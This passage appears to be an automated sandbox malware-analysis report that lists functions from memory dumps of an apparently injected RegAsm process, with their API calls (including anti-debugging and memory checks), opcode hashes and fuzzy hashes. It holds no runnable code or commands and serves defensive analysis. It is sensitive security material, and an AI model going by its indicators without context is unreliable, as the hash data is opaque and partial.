Instruction Fuzzy Hash: 77815570A00B05CFD7A4DF6AD84479ABBF1BF88604F10892DD49AD7B50DB35E889CB91

Function 011BF2A8 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2699635991.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e017303f2823f1f5378410631a94a46ff3d8c512eef4129afc1aa7448584a1
Instruction ID: 3ede63aa842cb6de08474d7caa61361f5c698d8d44f4224acf57ff4eb1b3bb11
Opcode Fuzzy Hash: 35e017303f2823f1f5378410631a94a46ff3d8c512eef4129afc1aa7448584a1
Instruction Fuzzy Hash: CA410031E0439A8FCB04DFB9D8106AEBBB1AF89210F1485ABD544A7291DB789845CB90

Function 066B6B58 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,066B7026,?,?,?,?,?), ref: 066B70E7

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 786d63bfcab533c4bc021f1d7dc8ee1d7b4219c316fceec5347efda12ebaa1ca
Instruction ID: b7ac1224e0604b7f3198a1b92bbeb2333adbc180962ceadc64d28276ce302761
Opcode Fuzzy Hash: 786d63bfcab533c4bc021f1d7dc8ee1d7b4219c316fceec5347efda12ebaa1ca
Instruction Fuzzy Hash: 2421D2B5900249DFDB10CFAAD884AEEBBF8EB48720F14841AE914A7310D775A954CFA5

Function 066B7058 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,066B7026,?,?,?,?,?), ref: 066B70E7

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1e13df71b43d150f1b1a26a1ab6c18f08675c1a270622ff6fde9c56d10a8c06b
Instruction ID: 5f2deaf215ad112ebb81629ccb987dec50c0a98f78541802abc5ef4125c01769
Opcode Fuzzy Hash: 1e13df71b43d150f1b1a26a1ab6c18f08675c1a270622ff6fde9c56d10a8c06b
Instruction Fuzzy Hash: 5921F2B59002499FDB10CFAAD884ADEBFF8EB48320F14841AE914A3310D375A940CFA0

Function 011B70A8 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 011B7127

Memory Dump Source

Source File: 00000007.00000002.2699635991.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11b0000_RegAsm.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 4eea26910dd987fa8f627f61c49d16b4b86b45c0bae32221a5ca06cc48df0194
Instruction ID: 8b0a6b450d1c456b8d633e944c5260c52d66f94870800a5be2d83348a0247b8e
Opcode Fuzzy Hash: 4eea26910dd987fa8f627f61c49d16b4b86b45c0bae32221a5ca06cc48df0194
Instruction Fuzzy Hash: 022148B680125A8FDB04CFAAD884BEEFBF5AF48221F15845AD458B7390C7389944CF60

Function 066BF678 Relevance: 1.6, APIs: 1, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,066BF4F9,00000800,00000000,00000000), ref: 066BF6EA

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 49bea97881be9bf37e8641fd409f32af9387d92549ccac4e05b27f15b6cbd1c8
Instruction ID: 3b1c0fb025274b227805a6daa86d24744be5b70d9c39594c5ba2f0f19df9b82e
Opcode Fuzzy Hash: 49bea97881be9bf37e8641fd409f32af9387d92549ccac4e05b27f15b6cbd1c8
Instruction Fuzzy Hash: AF2117B6C003099FDB10DFAAD844ADEFBF8EB48720F10841ED519A7210D775A545CFA5

Function 066BE1A0 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,066BF4F9,00000800,00000000,00000000), ref: 066BF6EA

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d7996bbf17ed9a657b8cb71cc5f370f2153550c012c9d1e4b913d8953261273f
Instruction ID: 549953a35e42ae57dbb187689291e885ce80deccda0ad87adce430e6ca7c5f6d
Opcode Fuzzy Hash: d7996bbf17ed9a657b8cb71cc5f370f2153550c012c9d1e4b913d8953261273f
Instruction Fuzzy Hash: B011F4B6D002499FDB10CF9AD844ADEBBF4EB48710F10842ED915A7210D375A545CFA5

Function 011BF390 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 011BF3F7

Memory Dump Source

Source File: 00000007.00000002.2699635991.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11b0000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: dbd239d58777b22e698f5c52967787e77936e52503038de3731f63bc092dd373
Instruction ID: 64828baf5678812c4c34d694a68c74dab9ddc6eadfd88bf2467b3e0e6c3b4170
Opcode Fuzzy Hash: dbd239d58777b22e698f5c52967787e77936e52503038de3731f63bc092dd373
Instruction Fuzzy Hash: 7E111FB1C0065A9BDB14DFAAD844BDEFBF4AF48720F14812AD918A7240D778A945CFA1

Function 066BF418 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 066BF47E

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7651cb6112f2e572bcca2430d8a8f5ddf80d4f8267ff4020844fb6d585f94d2e
Instruction ID: 0e6566de35a2bf7b5413832955538d2a40346c8424a7ed6bdae366ce2bb27bb8
Opcode Fuzzy Hash: 7651cb6112f2e572bcca2430d8a8f5ddf80d4f8267ff4020844fb6d585f94d2e
Instruction Fuzzy Hash: 3A110FB6C003498FCB10CF9AC944ADEFBF4EB88624F10841AD418A7610C378A545CFA1

Function 066CD018 Relevance: .8, Instructions: 801COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7bb6d48dc8abd32f7d7d465dee4edee8897b2bf8189f60409da9231ecd19fe
Instruction ID: 4dc33020d3bbb023ab09ab44d92f0fa4211e7fb42ad71ddd950154960b7f22e7
Opcode Fuzzy Hash: 2d7bb6d48dc8abd32f7d7d465dee4edee8897b2bf8189f60409da9231ecd19fe
Instruction Fuzzy Hash: 47627C30A0071A8FDB55EF68D580A6EB7B2FF84314F209A29D8059F758DB75EC46CB81

Function 066CB718 Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf035f22115aaba70f3d9cd6d7fa3fe2da40dca1c13400467e38078c9a56e98
Instruction ID: 27330e3f1bbc1f6b14ef538bab2cf6f3c44293ec578b8faec67ae8b6a81ad6c9
Opcode Fuzzy Hash: 0cf035f22115aaba70f3d9cd6d7fa3fe2da40dca1c13400467e38078c9a56e98
Instruction Fuzzy Hash: 68026930E106198FDBA4DFA8D4816BDB7B2FB85320F24856AD815EB345DB35EC81CB91

Function 066C2B9E Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0258df329d625f21a52d5d1d6e88c875f64b91d025744c05a3de19ee91e0d3ec
Instruction ID: d29869168770f3eae3ca895ba5230d9265d61136385a179c752cdc8a683d7b93
Opcode Fuzzy Hash: 0258df329d625f21a52d5d1d6e88c875f64b91d025744c05a3de19ee91e0d3ec
Instruction Fuzzy Hash: F8125830A007148FCB64DB64C594A6DBBF2FF84325F54C4A9D81AAB351DB36ED85CB90

Function 066CAD98 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244015b0f1a0325759cef39255fdfa384b8dc2362059fd943c6b19b5316e9a85
Instruction ID: 2e8833b5ea5cb817c6ac9a6165457f95e33461f4bad3c66f49d3225853f584fb
Opcode Fuzzy Hash: 244015b0f1a0325759cef39255fdfa384b8dc2362059fd943c6b19b5316e9a85
Instruction Fuzzy Hash: D7E16E30E1071A8FDB69DFA8D5906AEB7B2FF88314F108529D816EB344DB359C46CB91

Function 066C9218 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6037ac45470750c7f3f4dfc4e6f8e891d341592d810b5f7f793e1a2f18e0351
Instruction ID: 902e6d7fda6e34140e5a7a71dfebc610644bad448765de72de319d14e2673bd6
Opcode Fuzzy Hash: b6037ac45470750c7f3f4dfc4e6f8e891d341592d810b5f7f793e1a2f18e0351
Instruction Fuzzy Hash: 90914E30B1161A8FDB94DF68D8607AEB7B6EF85310F108569C809EB344EE319D869B91

Function 066C5EB8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ae610d51bb996707b38e763c8865eb0b53e8d61e4d9b10a3e501908411b781
Instruction ID: 4f09b950d06b5b4abd706e4288d56db4505ef056792a1fd6d7f1564d2f065699
Opcode Fuzzy Hash: 96ae610d51bb996707b38e763c8865eb0b53e8d61e4d9b10a3e501908411b781
Instruction Fuzzy Hash: 7361B1B1F005214FDF54AA6DCC40A6EBADBEFC4620B15443AD80ADB3A0DE65FD4287D5

Function 066C3F59 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4043a6e498fa1ce8188069f9b553975d85a1b92b6dd0fa9ad940dcab112306
Instruction ID: 008c3e172eac9c0251aedfd0d8bd46a3588db2cf66b4bc73c2436ba05d5e8181
Opcode Fuzzy Hash: 0b4043a6e498fa1ce8188069f9b553975d85a1b92b6dd0fa9ad940dcab112306
Instruction Fuzzy Hash: E5811F30B1060A8FDB54DBA5D46476EBBF6EF89314F108529D80AEB344DF35DC428B91

Function 066C4274 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db9ca046cb02cf12aef93ce1c68a5f67afeb73c4eaa6e51757fef3f6fef39a0
Instruction ID: e919e45814f1578a17e83a67b0250932ddef0d71695af26c5000c78604c3e1f9
Opcode Fuzzy Hash: 1db9ca046cb02cf12aef93ce1c68a5f67afeb73c4eaa6e51757fef3f6fef39a0
Instruction Fuzzy Hash: 92915C30E106198BDF64DF68C890B9DB7B1FF89310F208699D449BB345DB71AD85CB90

Function 066C4288 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365fcf18d2611b4725a7dac2b9437e494ca57c0c8e4116b03301b082a2ed02d0
Instruction ID: e2db4354617585dc152f8af9b6314116f33902b42d907359db66fe44cd40d104
Opcode Fuzzy Hash: 365fcf18d2611b4725a7dac2b9437e494ca57c0c8e4116b03301b082a2ed02d0
Instruction Fuzzy Hash: 88914A30E1061A8BDF64DF68C890B9DB7B1FF89310F208699D509BB344DB71AE85CB90

Function 066CEBE1 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37fa1c313af89e607e29d408268b95e034b50806b743af239b58e06008d71750
Instruction ID: 6b50017841cff67812c1baa587cf29214734e58d09732294dd890dcedce344c4
Opcode Fuzzy Hash: 37fa1c313af89e607e29d408268b95e034b50806b743af239b58e06008d71750
Instruction Fuzzy Hash: 45714830A006499FDB58DFA9C980AADBBF6FF88314F248429E415EB355DB31E846CB54

Function 066CEBF0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e31300040b3fb2282eb538ab63d5f2cb00c8337e4aa03f92d79219ddeeb915
Instruction ID: 4153bc20240633002362a89e5d1d4346320683ab4f855104811e2be51a99c317
Opcode Fuzzy Hash: 34e31300040b3fb2282eb538ab63d5f2cb00c8337e4aa03f92d79219ddeeb915
Instruction Fuzzy Hash: 1F714A30A006499FDB58DFA9C980AADBBF6FF88314F248429E415EB354DB31EC46CB54

Function 066C4820 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae70f502667a12489399ce0c0017c6b33b8fba260996fe0ac1feba86273a77e
Instruction ID: 5446e911b992b99911fb75532025d886aafb875ff178260e0cf65dde2b67fe3e
Opcode Fuzzy Hash: 2ae70f502667a12489399ce0c0017c6b33b8fba260996fe0ac1feba86273a77e
Instruction Fuzzy Hash: F5617C30E002199FEB55DBA5C8547AEBAF6FBC8350F208429E51AEB394DF758C418B94

Function 066CFD58 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0fb72dca60aa9a343e58e7d71d5a6fc34b49b80b442a7d49c3d5b0b2db45fe
Instruction ID: 0b9742db3b2bdf1232de7f240fd1c2e9502780829906935e17f5202e0799042a
Opcode Fuzzy Hash: aa0fb72dca60aa9a343e58e7d71d5a6fc34b49b80b442a7d49c3d5b0b2db45fe
Instruction Fuzzy Hash: DA51AE31E006059FDB58EB78E4846ADBBB3EF89325F10886EE116D7250DB359955CB80

Function 066C9208 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f39381568c956f6543442d1725a581cf156a994c8169affe059702e117cab6
Instruction ID: b52a3a1d244ea7f8086943ea4a5149b6000ced5e6900c2b76eb027289a50b70d
Opcode Fuzzy Hash: 44f39381568c956f6543442d1725a581cf156a994c8169affe059702e117cab6
Instruction Fuzzy Hash: 9F515F30B116169FDB94EB68D860BAE77F6FF88710F108569D80AE7344EE35DC429B90

Function 066CF700 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c1cfe51c844e0394636bc0a378f9453172bed9587e7f42d7feca56a74db42b8
Instruction ID: 3ecb492f7583621d272c2ed75d61344b5c2ddfb7267a90338393aefba50c5e3b
Opcode Fuzzy Hash: 5c1cfe51c844e0394636bc0a378f9453172bed9587e7f42d7feca56a74db42b8
Instruction Fuzzy Hash: 1551B130B10214AFEF646668D994B7E766BDBCD721F60042AE00AC7795CF39CC41A3A2

Function 066CF710 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e140a4a22914ab5c3396cc8d2f314b7ebf6eb26336531263e3ac51ec0943348
Instruction ID: 7a8d6708b5c33909c8d5ac1ee87d9f6e332c362e72bd39b11f7349eccca00e17
Opcode Fuzzy Hash: 1e140a4a22914ab5c3396cc8d2f314b7ebf6eb26336531263e3ac51ec0943348
Instruction Fuzzy Hash: C151C130B10214ABFF646668D994B3E766BDBCD720F60042EE00AC7794CF39CC41A3A2

Function 066C5249 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 840008795a3d0bd14365cfc520d5e00a84634becf7a2e2b0aa6dbdeba8341523
Instruction ID: 068854693f0e38044f178690c204dc00b58cdba286803b7b818d419b6055cca6
Opcode Fuzzy Hash: 840008795a3d0bd14365cfc520d5e00a84634becf7a2e2b0aa6dbdeba8341523
Instruction Fuzzy Hash: 0951A570E109158BDF64CB64C88077EBBB2FB45320F24852AE45AD7385D779EC61CB91

Function 066C50C8 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac874ddd517ad665f33691d263990110d79da4cf903db0fb6ee479b09ef54a57
Instruction ID: 0d30e09b652403bbcc54784c6006ce593c023318078336d94a97f116e6fdcc4a
Opcode Fuzzy Hash: ac874ddd517ad665f33691d263990110d79da4cf903db0fb6ee479b09ef54a57
Instruction Fuzzy Hash: B7417E31E00A099FDF60CFA9DC84ABFF7F2FB95220F10492AE116D7640D334A9658B91

Function 066C4810 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039098183b8eda87e6a9de4f63e626620fdfaa34586028add728fc03523727aa
Instruction ID: ae061d1a0e64eab4022f354175deb3acc98df5231346664bbf16aac7c0980285
Opcode Fuzzy Hash: 039098183b8eda87e6a9de4f63e626620fdfaa34586028add728fc03523727aa
Instruction Fuzzy Hash: 96415E30A102199FDB55AFA9C854BAEBBF6FF88700F208529D505AB394DF759C418B90

Function 066CDB85 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09cf5a7d659844f26f31b69b227b021c082b4df5d84c758727a77dd4d6181e6
Instruction ID: e19fecc139dd60efb113dea1ac831e668165d6977871a5e024030d7ca427b0df
Opcode Fuzzy Hash: b09cf5a7d659844f26f31b69b227b021c082b4df5d84c758727a77dd4d6181e6
Instruction Fuzzy Hash: D1419030E0074A9FDB65DFA5C4446AEBBB6FF85750F20493AD811EB340DB709842CB81

Function 066C22A8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b4b864a60bb7e3eeb9f02c5482348a6aebb0b06a637acd1724935c66ad702e
Instruction ID: 2bc0514d81ea744b3de60172da641c1633bcc2be2ba9e39dff2d00663b0b84e3
Opcode Fuzzy Hash: 03b4b864a60bb7e3eeb9f02c5482348a6aebb0b06a637acd1724935c66ad702e
Instruction Fuzzy Hash: A531C130B007058FDB58AB74C56466F7BA7FB88650B14886CD806EB344DF35CD41DB95

Function 066C2158 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5dd1e98c28fcd00346e88ad8cf1c029e83b98c35fb183977acdf08cebc9396
Instruction ID: d2778e65d7c1b83783d837296101c6180e11241994a8a7e485698f7162a3d2a4
Opcode Fuzzy Hash: bc5dd1e98c28fcd00346e88ad8cf1c029e83b98c35fb183977acdf08cebc9396
Instruction Fuzzy Hash: 97319230E106169FCB44CFA8D8A46AEB7B6FF89310F10851DE906EB740DB75AD45CB40

Function 066C2168 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c351237bf858b81bba9e21b655d80130dfbe4c5f8e06d8f04d9086252503e6
Instruction ID: 165b263d1da508f8f6c04fa2844100c27fd7e9c9413220e4c444677210070554
Opcode Fuzzy Hash: e1c351237bf858b81bba9e21b655d80130dfbe4c5f8e06d8f04d9086252503e6
Instruction Fuzzy Hash: 4B318030E106169FCB44CFA4C8646AEB7B6FF89310F10851DE906EB740DB75AD46CB80

Function 066C3B61 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8315305eaae937511869ec9b403a2e20563a99bbac397d49e7af2cbaf69c5e8d
Instruction ID: 583dc6f9f7f4c6a72c10d80f04be86809a19aa266d2852e9789ffa93b15dabda
Opcode Fuzzy Hash: 8315305eaae937511869ec9b403a2e20563a99bbac397d49e7af2cbaf69c5e8d
Instruction Fuzzy Hash: C0219A75E007159FDB40EF68E980AAEBBF5EB88720F10842AE941F7340E731DC808B90

Function 066C3B70 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0af75a28bdf9882824a1fddb4663c0b7a3d1f728f0debc74acebe6652e05b7
Instruction ID: 88ac4347405b2a7cc607f214dcaf8e7ba8ff11bc2ae8c9b74fc0e3fa7dee2d15
Opcode Fuzzy Hash: 4a0af75a28bdf9882824a1fddb4663c0b7a3d1f728f0debc74acebe6652e05b7
Instruction Fuzzy Hash: F7217A75F006159FDB50EF69E980AAEBBF5EB48720F108029E945F7354E731DD818B90

Function 0113D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2699283355.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_113d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f466c2ba7d03f5bbb5b7d5a02d69e38e98ea6d5854a33189f6f2cf1e6a09a16e
Instruction ID: 924750f350fee2058a83ceac14c36d1ca354cfb3497b133d750176ac6d53091f
Opcode Fuzzy Hash: f466c2ba7d03f5bbb5b7d5a02d69e38e98ea6d5854a33189f6f2cf1e6a09a16e
Instruction Fuzzy Hash: 612100B16043049FDF19CF64E984B26FB65FBC4B14F60C5ADE8494B24AC73AD446CA62

Function 066C3C80 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495f84aabaa3f5faf5f0ed34452602019ea4e313c91056bbae501c592aac7451
Instruction ID: 4ee1981d2e59da1183b417e897e755a5a86fd22e3e3c4b4d3a2b73bd1dae178e
Opcode Fuzzy Hash: 495f84aabaa3f5faf5f0ed34452602019ea4e313c91056bbae501c592aac7451
Instruction Fuzzy Hash: EC116D31B105298BDB949A78D8546BE77ABEBC9221F008539D906E7344EE25DC028BA1

Function 066CEE61 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
